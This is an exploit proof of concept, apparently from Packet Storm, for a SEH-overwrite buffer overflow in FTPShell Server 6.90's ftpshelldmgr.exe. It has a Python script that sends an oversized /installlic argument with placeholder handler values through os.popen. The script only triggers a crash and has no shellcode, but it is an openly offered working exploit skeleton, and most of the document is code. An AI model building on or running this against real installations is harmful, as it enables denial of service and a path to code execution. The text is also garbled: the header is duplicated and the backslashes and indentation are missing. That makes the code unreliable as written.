FTPShell Server 6.90 Buffer Overflow ≈ Packet Storm
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download, Install, the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download, Install, the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)
# SEH chain of main thread
# Address SE handler
# 0020FBFC 43434343
# 42424242 *** CORRUPT ENTRY ***
#!/usr/bin/python
import os
directory = 'C:Program FilesFTPShellServer\' #default
#directory = 'C:Program Files (x86)FTPShellServer\' #directory_for_x64
offset = 'x41'*1112
nSEH = 'x42x42x42x42'
SEH = 'x43x43x43x43'
payload = offset+nSEH+SEH
try:
print("[+] Creating %s sending evil payload." %len(payload))
comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
stream = os.popen(comm)
output = stream.read()
print("[+] payload sent!")
except:
print("Failed.")
Gloss